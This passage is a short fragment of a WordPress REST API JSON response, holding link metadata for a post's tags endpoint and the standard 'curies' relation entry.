e":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6925"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}